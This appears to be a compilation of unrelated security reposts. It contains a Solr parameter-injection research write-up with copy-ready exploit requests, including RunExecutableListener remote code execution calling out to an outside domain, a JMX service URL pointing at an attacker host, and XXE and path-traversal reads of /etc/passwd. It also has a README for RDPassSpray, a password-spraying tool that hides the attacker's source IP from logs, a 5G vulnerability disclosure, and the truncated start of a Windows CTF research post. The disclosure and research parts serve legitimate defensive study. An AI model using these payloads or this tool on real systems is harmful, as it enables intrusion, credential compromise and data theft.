[CVE-2017-12629] Remote Code Execution via RunExecutableListener
[CVE-2019-0192] Deserialization of untrusted data via jmx.serviceUrl
Attack via deserialization
Attack via direct access to JMX
[CVE-2019-0193] Remote Code Execution via dataImportHandler
[CVE-2012-6612, CVE-2013-6407, CVE-2013-6408] XXE in the Update Handler
[CVE-2013-6397] Remote Code Execution via XSLT response writer and path traversal
[CVE-2017-3163] Arbitrary file read via path traversal attack in ReplicationHandler
Black box detection
Conclusion

Introduction

This research aims to present a new vulnerability, "Solr parameter injection", and to describe how it may be exploited in different scenarios. It also accumulates all public exploits for Apache Solr.

Apache Solr is an open source enterprise search platform, written in Java, from the Apache Lucene project. Its major features include full-text search, hit highlighting, faceted search, dynamic clustering, and document parsing. You may treat it like a database: you run the server, create a collection, and send different types of data to it (such as text, XML documents, PDF documents, pretty much any format). Solr automatically indexes this data and provides a fast but rich REST API interface to search over it. The only protocol to talk to the server is HTTP, and yes, it's accessible without authentication by default, which makes it a perfect victim for SSRF, CSRF and HTTP Request Smuggling attacks.

Solr API quick overview

When you start a Solr instance (e.g. by using the "./bin/solr start -e dih" command) it creates a web server on port 8983. The default example comes with some data inside, so we can immediately search in it.
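Such a search can be issued from client code in a few lines. A minimal sketch using only the standard library (the host, port and the "db" collection name follow the article's examples; the URL is only built here, not sent):

```python
# Sketch: build a properly encoded Solr /select request URL.
from urllib.parse import urlencode

def solr_select_url(base, collection, **params):
    # urlencode() percent-encodes each value, so user-supplied
    # parameters cannot break out of their own key=value pair.
    return f"{base}/solr/{collection}/select?{urlencode(params)}"

url = solr_select_url("http://localhost:8983", "db",
                      q="Apple", wt="json", fl="id,name", rows=10)
print(url)
# To actually send it: urllib.request.urlopen(url).read()
```

The encoding step in `urlencode()` is exactly what the vulnerable applications discussed below forget to do.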
This is a simple query that searches for the "Apple" keyword in all documents and returns the result in JSON format. A more complex query may look like this:

The main parameters here are:

/solr/db/select - "db" is the collection name; "/select" means we would like to perform a search operation handled by the SearchHandler
q={!dismax+df=name}Apple - This query searches for the "name" field containing the "Apple" keyword, using the "dismax" query parser. The data between braces is parsed as Solr local parameters
fl=*,score,similar:[subquery] - "fl" stands for the field list to be returned; the [subquery] transformer allows including data from another search query in the resulting document. In our case the subquery searches for the "computer" keyword.

Apart from search, there is the possibility to perform update operations, view and modify the config, or even perform a replication. If we have access to the Solr Web Interface, we can upload and modify any data and do almost any operation. By default, there are no users or roles, which makes it a perfect target for SSRF, CSRF and HTTP Request Smuggling attacks.

Apache Solr Injection

Like a database, in most cases the Solr REST API is not directly accessible to end users and is used only internally by other applications. In these cases, we would like to introduce a couple of new attacks against web applications that use Solr.

Solr Parameters Injection (HTTP smuggling)

If a target web application uses untrusted user input when making HTTP API calls to Solr, it potentially does not properly encode the data with URL encoding.
Here is a simple Java web application that accepts just one "q" parameter and performs a search operation by making a server-to-server HTTP request to Solr:

@RequestMapping("/search")
@Example(uri = "/search?q=Apple")
public Object search1(@RequestParam String q) {
    //search the supplied keyword inside solr
    String solr = "http://solrserver/solr/db/";
    String query = "/select?q=" + q + "&fl=id,name&rows=10";
    return http.get(solr + query);
}

Since there is no URL encoding applied to this parameter, by sending payloads such as 'q=123%26param1=xxx%26param2=yyy' it is possible to inject additional HTTP query parameters into the Solr search request and change the logic of how the request is processed. The '%26' character here is the encoded version of the '&' character, which is a parameter delimiter in the HTTP query.

A normal request from a user to the web app:
GET /search?q=Apple
leads to the following request from the web app to the Solr server:
GET /solr/db/select?q=Apple

A malicious request from a user to the web app:
GET /search?q=Apple%26xxx=yyy
leads to the following request from the web app to the Solr server:
GET /solr/db/select?q=Apple&xxx=yyy

As you can see here, due to the parameter injection vulnerability, the 'q' parameter is decoded by the web app, but not properly encoded in the request to the Solr server. So, the main question is: what can we do with it? Considering the request will be sent to '/select' anyway, what parameters can we send to do something malicious on the Solr side? Well, Solr supports a lot of different query parameters, but the most interesting ones for exploitation are:

shards=http://127.0.0.1:8983/ - by specifying the shards parameter we can make the target Solr server act as a reverse proxy, sending this request to another or our own malicious Solr node. It allows attackers to feed arbitrary data to the Solr server, or even reach the firewall-protected Admin API. *N.B.
Restricted in 7.7.1+
qt=/update - allows rewriting the handler for the request (from /select to /update or any other). Although the vulnerable application will always send the request to '/solr/db/select', it may give developers a false feeling that this request will be processed as a search request. In fact, by using the 'qt' and 'shards' parameters we can reach the '/update' or '/config' Solr endpoints.
shards.qt=/update - also allows rewriting the request handler
stream.body=xxx - allows rewriting the full request body. Disabled in the latest versions, but usable if we target outdated Solr.

If we can 'smuggle' these parameters into the Solr query, it could be a serious vulnerability that may lead to data modification inside the Solr instance and even RCE in some cases.

Exploitation examples

The exploit request to change Solr config properties may look like:
GET /search?q=Apple&shards=http://127.0.0.1:8983/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}

To query data from another collection:
GET /solr/db/select?q=orange&shards=http://127.0.0.1:8983/solr/atom&qt=/select?fl=id,name:author&wt=json

To update data in another collection:
GET /solr/db/select?q=Apple&shards=http://127.0.0.1:8983/solr/atom&qt=/update?stream.body=[%257b%2522id%2522:%25221338%2522,%2522author%2522:%2522orange%2522%257d]%26wt=json&commit=true&wt=json

Another way to exploit this vulnerability is to alter the Solr response. The "fl" parameter lists the fields that should be returned by the query. For example, by issuing the following request we are asking to return only the 'name' and 'price' fields:
GET /solr/db/select?q=Apple&fl=name,price

When this parameter is tainted, we can leverage the ValueAugmenterFactory (fl=name:[value v='xxxx']) to inject additional fields into the document, and specify the injected value ('xxxx') right inside the query.
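To make the ValueAugmenterFactory trick concrete, a tainted "fl" value can be assembled like this (a sketch; the field names and the 'xxxx' marker mirror the example above, and the helper itself is hypothetical, not part of any Solr client):

```python
# Sketch: what a tainted "fl" parameter looks like after an attacker
# appends a ValueAugmenterFactory entry to the field list.
def tainted_fl(fields, injected_value):
    # name:[value v='...'] adds a synthetic "name" field whose content
    # is taken verbatim from the query string itself.
    return ",".join(fields + [f"name:[value v='{injected_value}']"])

fl = tainted_fl(["name", "price"], "xxxx")
print("/solr/db/select?q=Apple&fl=" + fl)
```

The injected value never touches the index; Solr copies it straight from the request into every returned document.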
Moreover, in conjunction with the XML Transformer (fl=name: ) we can parse the provided value on the server side and include it in the result document without escaping. This technique may be used for XSS, for example:
GET /solr/db/select?indent=on&q=*&wt=xml&fl=price,name:[value+v='<a:script+xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>'],name:[xml]

p.s. no XXE here unfortunately (at least in 7.6)
p.p.s. RawValueTransformerFactory was introduced in Solr 5.2+

Solr Local Parameters Injection

The more common case is when only the "q" (query) parameter comes from untrusted input and is properly encoded, for example:

@RequestMapping("/search")
public Object select(@RequestParam(name = "q") String query) {
    //search the supplied keyword inside solr and return the result
    return httprequest(solrURL + "/db/select?q=" + urlencode(query));
}

In this case it is still possible to specify the parser type and the Solr local parameters used by this parser, e.g.:
GET /search?q={!type=_parser_type_+param=value}xxx

This attack was described back in 2013, but until 2017 nobody knew how to exploit it. In 2017, we reported CVE-2017-12629 and discovered a way to trigger XXE by using the 'xmlparser' parser and escalate it to a Solr parameters injection vulnerability:
GET /search?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://127.0.0.1:/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}

In other Solr versions where CVE-2017-12629 does not work or is patched, the local parameters injection is almost harmless. Well, it could probably be used to cause DoS, but even by using Lucene syntax we can make heavy queries, so DoS does not really count here. Another potential way to exploit the local parameters injection is to use the Join Query Parser to access the data from another collection:
GET /search?q={!join from=id fromIndex=anotherCollection to=other_id}Apple

But it is not always possible, as the other collection should contain the same IDs.
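It is worth spelling out why proper URL encoding does not stop this class of attack: the application's urlencode() only protects the HTTP query structure, and Solr decodes the value back before handing it to the query parser, so a local-parameters prefix arrives intact. A quick sketch (the DOCTYPE payload is illustrative; `127.0.0.1/x` is a placeholder URL):

```python
# Sketch: encoding protects the transport, not the query parser.
from urllib.parse import quote, unquote

payload = "{!xmlparser v='<!DOCTYPE a SYSTEM \"http://127.0.0.1/x\"><a></a>'}"
encoded = quote(payload)    # what a properly-encoding app sends to Solr
decoded = unquote(encoded)  # what Solr's parameter handling sees again
print(decoded.startswith("{!xmlparser"))  # local-params syntax survives
```

This is why the fix has to happen in Solr's parser configuration (or by stripping the `{!...}` prefix), not in the web application's encoding layer.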
Therefore, until somebody finds a better way to exploit local parameters injection, I would not consider it a security vulnerability, given that CVE-2017-12629 is patched.

Ways to RCE

Attackers are normally not interested in the data stored within the cluster (it may be non-sensitive), but rather in achieving RCE or local file read. Fortunately, there are a couple of vulnerabilities allowing it:

1. [CVE-2017-12629] Remote Code Execution via RunExecutableListener

Target Solr version: 5.5x-5.5.5, 6x-v6.6.2, 7x - v7.1
Requirements: none

The attack leverages the Solr ConfigApi to add a new RunExecutableListener that executes a shell command. After adding this listener you need to perform an update operation using the /update handler to trigger the command execution. There is a public exploit explained; thanks to Olga Barinova for sharing ideas on how to exploit it.

Exploit via direct connection to a Solr server:

POST /solr/db/config HTTP/1.1
Host: localhost:8983
Content-Type: application/json
Content-Length: 213

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"nslookup",
    "dir":"/usr/bin/",
    "args":["solrx.x.artsploit.com"]
  }
}

Exploit via Solr Parameters Injection:

GET /solr/db/select?q=xxx&shards=localhost:8983/solr/db/config%23&stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"nslookup","dir":"/usr/bin/","args":["solrx.x.artsploit.com"]}}&isShard=true
GET /solr/db/select?q=xxx&shards=localhost:8983/solr/db/update%23&commit=true

Exploit via Solr Local Parameters Injection:

GET /solr/db/select?q={!xmlparser+v%3d'<!DOCTYPE+a+SYSTEM+"http%3a//localhost%3a8983/solr/db/select%3fq%3dxxx%26qt%3d/solr/db/config%3fstream.body%3d{"add-listener"%3a{"event"%3a"postCommit","name"%3a"newlistener","class"%3a"solr.RunExecutableListener","exe"%3a"nslookup","dir"%3a"/usr/bin/","args"%3a["solrx.x.artsploit.com"]}}%26shards%3dlocalhost%3a8983/"><a></a>'}
GET
/solr/db/select?q={!xmlparser+v='<!DOCTYPE+a+SYSTEM+"http://localhost:8983/solr/db/update?commit=true"><a></a>'}

For the next exploits we omit the payload strings for "Solr Parameters Injection" and "Solr Local Parameters Injection", as the logic of how they are created is the same (using the "xmlparser" type in conjunction with the "qt" and "stream.body" parameters).

2. [CVE-2019-0192] Deserialization of untrusted data via jmx.serviceUrl

Target Solr version: >5? (not sure when config API is introduced) - <7. In version 7 JMX is just ignored.
Requirements: Out-of-band connections from Solr are not firewalled; a suitable deserialization gadget exists in the target classpath OR there is network access to an arbitrary port of the JMX server (which will be opened on the machine where Solr is running during exploitation).

The ConfigApi allows setting the 'jmx.serviceUrl' property, which will create a new JMX MBeans server and register it on the specified RMI/LDAP registry.

POST /solr/db/config HTTP/1.1
Host: localhost:8983
Content-Type: application/json
Content-Length: 112

{
  "set-property": {
    "jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://artsploit.com:1617/jmxrmi"
  }
}

Under the hood, it triggers a JNDI call with the 'bind' operation to the target RMI/LDAP/CORBA server. Unlike the JNDI 'lookup' operation, remote classloading is not supported for 'bind' operations, so we cannot just return a reference with an external codebase.
At the same time, it creates a new unprotected JMX server via JMXConnectorServer.start():

public static MBeanServer findMBeanServerForServiceUrl(String serviceUrl) throws IOException {
    if (serviceUrl == null) {
        return null;
    }
    MBeanServer server = MBeanServerFactory.newMBeanServer();
    JMXConnectorServer connector = JMXConnectorServerFactory
        .newJMXConnectorServer(new JMXServiceURL(serviceUrl), null, server);
    connector.start();
    return server;
}

This call ends up in InitialDirContext.bind(serviceUrl) and then in sun.rmi.transport.StreamRemoteCall.executeCall() (if the RMI protocol is used), which contains the desired deserialization sink, ObjectInputStream.readObject(). It allows performing two types of attacks:

2.a Attack via deserialization

A malicious RMI server could respond with an arbitrary object that will be deserialized on the Solr side using Java's ObjectInputStream, which is considered unsafe. The easiest way to create a mock RMI server is probably to use the 'ysoserial.exploit.JRMPListener' class from the ysoserial tool. Depending on the target classpath, an attacker can use one of the "gadget chains" to trigger Remote Code Execution on the Solr side. One of the known gadgets applicable here is ROME, since Solr contains the "contrib/extraction/lib/rome-1.5.1.jar" library for data extraction, but this library is optional and should be included in the Solr config. The Jdk7u21 gadget chain is also worth trying.

[Expand to see steps to reproduce]

2.b Attack via direct access to JMX

Another way to exploit this vulnerability is to set up an innocent RMI registry (e.g. by using 'rmiregistry' from the JDK) and let Solr register JMX on it. During this, the target Solr application creates a JMX MBeans server on a random port and reveals this port to the attacker's RMI registry. If this port is not firewalled, an attacker can deploy a malicious MBean via the java_jmx_server Metasploit module or by using mjet.
This happens because the JMX MBeans server is created without any authentication.

[Expand to see steps to reproduce]

3. [CVE-2019-0193] Remote Code Execution via dataImportHandler

Target Solr version: 1.3 – 8.2
Requirements: DataImportHandler should be enabled, which is not the case by default

Solr has an optional DataImportHandler that is useful for importing data from databases or URLs. It is possible to include arbitrary JavaScript code inside the script tag of the dataConfig parameter that will be executed on the Solr server for each imported document.

Exploit via direct connection to the Solr server:

[Expand to see the properly encoded request]

When you test it, make sure the URL specified in the 'entity' section is accessible from the Solr side and returns a valid XML document for XPath evaluation.

Another way to exploit DataImportHandler is to use the dataSource type "JdbcDataSource" along with the driver "com.sun.rowset.JdbcRowSetImpl":

[Expand to see the properly encoded request]

In this way we trigger a deserialization attack with the known gadget chain based on the 'com.sun.rowset.JdbcRowSetImpl' class. It requires two setters to be called, for the 'jndiName' and 'autoCommit' properties, and leads us to the vulnerable 'InitialContext.lookup' operation, so we can exploit it as an ordinary JNDI resolution attack. See our Exploiting JNDI Injections article for more information about JNDI attacks. Solr is based on Jetty, hence the Tomcat trick is not applicable here, but you can rely on remote classloading, which was fixed for LDAP only quite recently.

4.
[CVE-2012-6612, CVE-2013-6407, CVE-2013-6408] XXE in the Update Handler

Target Solr version: 1.3 - 4.1 or 4.3.1
Requirements: none

If you have a very old version of Solr, it could also be affected by a trivial XXE in the update handler:

POST /solr/db/update HTTP/1.1
Host: 127.0.0.1:8983
Content-Type: application/xml
Content-Length: 136

<!DOCTYPE x [<!ENTITY xx SYSTEM "/etc/passwd">]>
<add>
  <doc>
    <field name="id">&xx;</field>
  </doc>
  <doc>
  </doc>
</add>

5. [CVE-2013-6397] Remote Code Execution via XSLT response writer and path traversal

Target Solr version: 1.3 - 4.1 or 4.3.1
Requirements: ability to upload an XSL file to any directory

There is a path traversal vulnerability found by Nicolas Grégoire in 2013; he also wrote a good blog post about it:

GET /solr/db/select/?q=31337&wt=xslt&tr=../../../../../../../../../../../../../../../../../usr/share/ant/etc/ant-update.xsl

It could lead to remote code execution if an attacker has the ability to upload a custom XSL file using the above-mentioned XXE or another vulnerability.

6.
[CVE-2017-3163] Arbitrary file read via path traversal attack in ReplicationHandler

Target Solr version: <5.5.4 and <6.4.1
Requirements: none

GET /solr/db/replication?command=filecontent&file=../../../../../../../../../../../../../etc/passwd&wt=filestream&generation=1

There is also an unfixed SSRF here, but given the existence of the "shards" feature it's hardly considered a vulnerability:

GET /solr/db/replication?command=fetchindex&masterUrl=http://callback/xxxx&wt=json&httpBasicAuthUser=aaa&httpBasicAuthPassword=bbb

Black box detection

Considering the attacks explained above, whenever a bug hunter discovers a search form on a website that looks like a full-text search, it is worth sending the following OOB payloads to detect the presence of this vulnerability:

GET /xxx?q=aaa%26shards=http://callback_server/solr
GET /xxx?q=aaa&shards=http://callback_server/solr
GET /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://callback_server/solr'><a></a>"}

Conclusion

No matter whether the Solr instance is facing the internet, behind a reverse proxy, or used only by internal web applications, allowing modification of Solr search parameters is a significant security risk. In cases where only a web application that uses Solr is accessible, by exploiting Solr (local) parameter injection it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution.

Special Thanks

Nicolas Grégoire - for the wonderful CVE-2013-6397
Olga Barinova - for the incredible idea of how to exploit CVE-2017-12629
Apache Solr Team - for timely fixing all of these vulnerabilities

Authors: Michael Stepankin, Veracode Research

Sursa: https://github.com/artsploit/solr-injection/
  15. RDPassSpray

RDPassSpray is a Python tool to perform password spraying attacks in a Microsoft domain environment.

ALWAYS VERIFY THE LOCKOUT POLICY TO PREVENT LOCKING OUT USERS.

How to use it

First, install the needed dependencies:

pip3 install -r requirements.txt

Second, make sure you have xfreerdp:

apt-get install python-apt
apt-get install xfreerdp

Last, run the tool with the needed flags:

python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]

Options to consider

-p / -P - single password or file with passwords (one per line)
-u / -U - single username or file with usernames (one per line)
-n - list of hostnames to use when authenticating (more details below)
-o - output file name (csv)
-s - throttling time (in seconds) between attempts
-r - random throttling time between attempts (based on user input for min and max values)

Advantages of this technique

Failed authentication attempts will produce event ID 4625 ("An account failed to log on") BUT the event won't have the source IP of the attacking machine: the event will record the hostname provided to the tool.

Tested OS

Currently tested on Kali Rolling against a Windows Server 2012 Domain Controller. I didn't have a fully logged environment for deeper testing; if you have one, please let me know how it looks on other systems.

Sample

Credit

This tool is based on the PoC made by @dafthack - https://github.com/dafthack/RDPSpray

Issues, bugs and other code-issues

Yeah, I know, this code isn't the best. I'm fine with it as I'm not a developer and this is part of my learning process. If there is an option to do some of it better, please let me know.

Not how many, but where.

Sursa: https://github.com/xFreed0m/RDPassSpray
  16. New vulnerabilities in 5G Security Architecture & Countermeasures (Part 1)

Written 8 August 2019 by Ravishankar Borgaonkar

The 5G network promises to transform industries and our digital society by providing enhanced capacity, higher data rates, increased battery life for machine-type devices, higher availability and reduced power consumption. In a way, 5G will act as a vehicle to drive the much-needed digital transformation race and will push the world into the information age. Also, 5G can be used to replace the existing emergency communication network infrastructures. Many countries are about to launch 5G services commercially, as the 5G standards, including security procedures, have been developed by the 3GPP group. The following map in Figure 1 shows 5G deployments worldwide.

Figure 1: 5G deployments worldwide [1]

With every generation from 2G to 5G, wireless security (over-the-air security between mobile phones and cellular towers) has been improving to address various threats. For example, 5G introduced additional security measures to counteract fake base station types of attacks (also known as IMSI catchers or Stingrays). Thus, the privacy of mobile subscribers using 5G networks is much better than in previous generations.

However, some of the wireless functionalities that existed in 4G are re-used in 5G. For example, the 3GPP standards group has designed several capabilities in the 4G and 5G specifications to support a wide range of applications including smart homes, critical infrastructure, industrial processes, HD media delivery, automated cars, etc. In simple words, such capabilities mean telling the cellular network "I am a mobile device" or "a car" or "an IoT device" in order to receive special network services. These capabilities play an essential role in the correct operation of the device with respect to its application.
In particular, they define the speed, frequency bands, security parameters, and application-specific parameters such as the telephony capabilities of the device. This allows the network to recognise the application type and accordingly offer the appropriate service. For example, an automated car indicates its Vehicle-2-Vehicle (V2V) support to the network and receives the required parameters to establish communication with surrounding vehicles.

Over the last several months, Dr. Ravishankar Borgaonkar, together with Altaf Shaik, Shinjo Park and Prof. Jean-Pierre Seifert (SecT, TU Berlin, Germany), experimented with 5G and 4G device capabilities both in a laboratory setting and in real networks. This joint study uncovers the following vulnerabilities:

Vulnerabilities in 5G

A protocol vulnerability in the 4G and 5G specifications TS 33.401 [2] and TS 33.501 [3] that allows a fake base station to steal information about the device and mount identification attacks
An implementation vulnerability in cellular network operator equipment that can be exploited during the device registration phase
A protocol vulnerability in the first release of LTE NB-IoT that affects the battery life of low-powered devices

Potential Attacks

An adversary can mount active or passive attacks by exploiting the above three vulnerabilities. In active attacks, he or she can act as a man-in-the-middle attacker to alter device capabilities. Another important point is that such attacks can be carried out using a low-cost hardware/software setup. As shown in Figure 2, we use a setup of about 2000 USD to demonstrate attack feasibility and the subsequent impact.

Figure 2: Experimental setup for MiTM attack [4]

In particular, we demonstrated the following man-in-the-middle (MiTM) attacks:

Fingerprinting Attacks – An active adversary can intercept device capabilities, identify the type of devices on a mobile network and infer the underlying applications.
To demonstrate the impact, we performed a Mobile Network Mapping (MNmap) attack, which results in the device type identification levels shown in Figure 3.

Downgrading Attacks – An active adversary can also alter radio capabilities to downgrade network services. For example, VoLTE calls can be denied to a particular mobile phone during the attack.

Battery Drain Attacks – Starting from 4G networks, there is a Power Saving Mode (PSM) defined in the specifications. All cellular devices can request the use of PSM by including a timer T3324 during the registration procedure. When PSM is in use, the 3GPP standard indicates turning off the radio baseband of the device and thus the radio operations; however, applications on the device (or sensors) can still operate depending on the device settings. An adversary can remove the use of the PSM feature from the device capability list during the registration phase, resulting in loss of battery power. In our experiment with an NB-IoT device, a power drain attack reduces the battery life by a factor of 5.

Figure 3: Device type identification levels [4]

More detailed information about the above attacks, their feasibility and their impact can be found in our full paper, titled “New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities” [4].

Responsible Disclosure

We discovered the vulnerabilities and attacks earlier this year. We followed a responsible disclosure procedure and notified GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme. In parallel, we also notified 3GPP, who is responsible for designing the 4G/5G security specifications, and the affected mobile network operators.

Research Impact & Countermeasures

We suggested in [4] that 3GPP should consider mandating security protection for device capabilities.
In particular, the Device Capability Enquiry message carrying radio access capabilities should be accessible/requested by the eNodeB (a base station in 4G or 5G, for example) only after establishing RRC security. This will prevent a MitM attacker from hijacking those capabilities. Consequently, fixing these vulnerabilities will help in mitigating IMSI catcher or fake base station types of attacks against 5G networks.

On the network operator side, the eNodeB configuration or implementation should be changed such that an eNodeB requests Device Capability Information only after establishing a radio security association. This is a relatively easy fix and can be implemented by the operators either as a software update or a configuration change on their eNodeBs. Nevertheless, in practice, only a minority of operators acquire capabilities after security setup. The difference among the various operators we tested clearly indicates that this could be either an implementation or a configuration problem.

While working with GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme, we received confirmation (with CVD number CVD-2019-0018) last week during the Device Security Group meeting in San Francisco that 3GPP SA3, the group that standardizes 5G security, has agreed to fix the vulnerabilities identified by us in [4]. Following is a snapshot of the countermeasures to be added to the 4G [2] and 5G [3] specifications respectively:

3GPP SA3 response to fix specification vulnerabilities

Even though fixes will be implemented in the 4G and 5G standards in the coming months, baseband vendors need longer periods (compared with normal Android or iOS software updates) to update their basebands, and hence attackers can still exploit this vulnerability against 4G and 5G devices. A summary of our findings, potential attacks, their impact and countermeasures is shown in the following Table 1 [4].
In part 2, we will be publishing our work on improving the 5G and 4G Authentication and Key Agreement (AKA) protocol to mitigate mobile subscriber privacy issues. We also outline AKA protocol related network configuration issues in deployed 4G networks worldwide.

References:

[1] 5G commercial network world coverage map: 5G field testing / 5G trials / 5G research / 5G development by country (June 15, 2019). https://www.worldtimezone.com/5g.html
[2] 3GPP. 2018. 3GPP System Architecture Evolution (SAE); Security architecture. Technical Specification (TS) 33.401. 3rd Generation Partnership Project (3GPP). http://www.3gpp.org/DynaReport/33401.htm
[3] 3GPP. 2018. Security architecture and procedures for 5G System. Technical Specification (TS) 33.501. 3rd Generation Partnership Project (3GPP). http://www.3gpp.org/DynaReport/33501.htm
[4] Altaf Shaik, Ravishankar Borgaonkar, Shinjo Park, and Jean-Pierre Seifert. 2019. New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities. In Proceedings of the 12th Conference on Security and Privacy in Wireless and Mobile Networks (WiSec ’19). ACM, New York, NY, USA, 221-231. DOI: https://doi.org/10.1145/3317549.3319728

Sursa: https://infosec.sintef.no/en/informasjonssikkerhet/2019/08/new-vulnerabilities-in-5g-security-architecture-countermeasures/
17. Tuesday, August 13, 2019

Down the Rabbit-Hole...

Posted by Tavis Ormandy, Security Research Over-Engineer.

“Sometimes, hacking is just someone spending more time on something than anyone else might reasonably expect.”[1]

I often find it valuable to write simple test cases confirming things work the way I think they do. Sometimes I can’t explain the results, and getting to the bottom of those discrepancies can reveal new research opportunities. This is the story of one of those discrepancies, and the security rabbit-hole it led me down.

It all seemed so clear...

Usually, windows on the same desktop can communicate with each other. They can ask each other to move, resize, close or even send each other input. This can get complicated when you have applications with different privilege levels, for example, if you “Run as administrator”. It wouldn’t make sense if an unprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began.

The code that verifies you’re allowed to communicate with another window is part of win32k!NtUserPostMessage. The logic is simple enough: it checks if the application explicitly allowed the message, or if it’s on a whitelist of harmless messages.

BOOL __fastcall IsMessageAlwaysAllowedAcrossIL(DWORD Message)
{
  BOOL ReturnCode; // edx
  BOOL IsDestroy; // zf

  ReturnCode = FALSE;
  if...
  switch ( Message )
  {
    case WM_PAINTCLIPBOARD:
    case WM_VSCROLLCLIPBOARD:
    case WM_SIZECLIPBOARD:
    case WM_ASKCBFORMATNAME:
    case WM_HSCROLLCLIPBOARD:
      ReturnCode = IsFmtBlocked() == 0;
      break;
    case WM_CHANGECBCHAIN:
    case WM_SYSMENU:
    case WM_THEMECHANGED:
      return 1;
    default:
      return ReturnCode;
  }
  return ReturnCode;
}

Snippet of win32k!IsMessageAlwaysAllowedAcrossIL showing the whitelist of allowed messages, what could be simpler.... ?

I wrote a test case to verify it really is as simple as it looks.
If I send every possible message to a privileged window from an unprivileged process, the list should match the whitelist in win32k!IsMessageAlwaysAllowedAcrossIL and I can move on to something else. Ah, I was so naive. The code I used is available here, and a picture of the output is below.

What the...?!

Scanning which messages are allowed across IL produces unexpected results.

The tool showed that unprivileged applications were allowed to send messages in the 0xCNNN range to most of the applications I tested, even simple applications like Notepad. I had no idea message numbers even went that high! Message numbers use predefined ranges: the system messages are in the range 0 - 0x3FF, then there are the WM_USER and WM_APP ranges that applications can use for their own purposes. This is the first time I’d seen a message outside of those ranges, so I had to look it up. The following are the ranges of message numbers.

Range                            Meaning
0 through WM_USER – 1            Messages reserved for use by the system.
WM_USER through 0x7FFF           Integer messages for use by private window classes.
WM_APP (0x8000) through 0xBFFF   Messages available for use by applications.
0xC000 through 0xFFFF            String messages for use by applications.
Greater than 0xFFFF              Reserved by the system.

This is a snippet from Microsoft’s WM_USER documentation, explaining reserved message ranges.

Uh, string messages? The documentation pointed me to RegisterWindowMessage(), which lets two applications agree on a message number when they know a shared string. I suppose the API uses Atoms, a standard Windows facility. My first theory was that RegisterWindowMessage() automatically calls ChangeWindowMessageFilterEx(). That would explain my results, and be useful information for future audits... but I tested it and that didn’t work!

...Something must be explicitly allowing these messages! I needed to find the code responsible to figure out what is going on.

Tracking down the culprit...
I put a breakpoint on USER32!RegisterWindowMessageW, and waited for it to return one of the message numbers I was looking for. When the breakpoint hits, I can look at the stack and figure out what code is responsible for this. $ cdb -sxi ld notepad.exe Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: notepad.exe (a54.774): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffa`ce142dbc cc int 3 0:000> bp USER32!RegisterWindowMessageW "gu; j (@rax != 0xC046) 'gc'; ''" 0:000> g 0:000> r @rax rax=000000000000c046 0:000> k Child-SP RetAddr Call Site 0000003a`3c9ddab0 00007ffa`cbc4a010 MSCTF!EnsurePrivateMessages+0x4b 0000003a`3c9ddb00 00007ffa`cd7f7330 MSCTF!TF_Notify+0x50 0000003a`3c9ddc00 00007ffa`cd7f1a09 USER32!CtfHookProcWorker+0x20 0000003a`3c9ddc30 00007ffa`cd7f191e USER32!CallHookWithSEH+0x29 0000003a`3c9ddc80 00007ffa`ce113494 USER32!_fnHkINDWORD+0x1e 0000003a`3c9ddcd0 00007ffa`ca2e1f24 ntdll!KiUserCallbackDispatcherContinue 0000003a`3c9ddd58 00007ffa`cd7e15df win32u!NtUserCreateWindowEx+0x14 0000003a`3c9ddd60 00007ffa`cd7e11d4 USER32!VerNtUserCreateWindowEx+0x20f 0000003a`3c9de0f0 00007ffa`cd7e1012 USER32!CreateWindowInternal+0x1b4 0000003a`3c9de250 00007ff6`5d8889f4 USER32!CreateWindowExW+0x82 0000003a`3c9de2e0 00007ff6`5d8843c2 notepad!NPInit+0x1b4 0000003a`3c9df5f0 00007ff6`5d89ae07 notepad!WinMain+0x18a 0000003a`3c9df6f0 00007ffa`cdcb7974 notepad!__mainCRTStartup+0x19f 0000003a`3c9df7b0 00007ffa`ce0da271 KERNEL32!BaseThreadInitThunk+0x14 0000003a`3c9df7e0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 So.... wtf is ctf? A debugging session trying to find who is responsible for these windows messages. The debugger showed that while the kernel is creating a new window on behalf of a process, it will invoke a callback that loads a module called “MSCTF”. That library is the one creating these messages and changing the message filters. 
The hidden depths reveal... It turns out CTF[2] is part of the Windows Text Services Framework. The TSF manages things like input methods, keyboard layouts, text processing and so on. If you change between keyboard layouts or regions, use an IME like Pinyin or alternative input methods like handwriting recognition then that is using CTF. The only discussion on the security of Text Services I could find online was this snippet from the “New Features” page: “The security and robustness of TSF have been substantially improved, to reduce the likelihood of a hostile program being able to access the stack, heap, or other secure memory locations.“ I’m glad the security has been substantially improved, but it really doesn’t inspire much confidence that those things used to be possible. I decided it would be worth it to spend a couple of weeks reverse engineering CTF to understand the security properties. So... how does it all work? You might have noticed the ctfmon service in task manager, it is responsible for notifying applications about changes in keyboard layout or input methods. The kernel forces applications to connect to the ctfmon service when they start, and then exchange messages with other clients and receive notifications from the service. A ctfmon process is started for each Desktop and session. Consider the example of an IME, Input Method Editor, like Microsoft Pinyin. If you set your language to Chinese in Windows, you will get Microsoft Pinyin installed by default. This is what Microsoft Pinyin looks like. Other regions have other IMEs, if your language is set to Japanese you get Microsoft JP-IME, and so on. These IMEs require another process to see what is being entered on the keyboard, and to change and modify the text, and the ctf service is responsible for arranging this. An IME application is an example of an out-of-process TIP, Text Input Processor. There are other types of TIP, and CTF supports 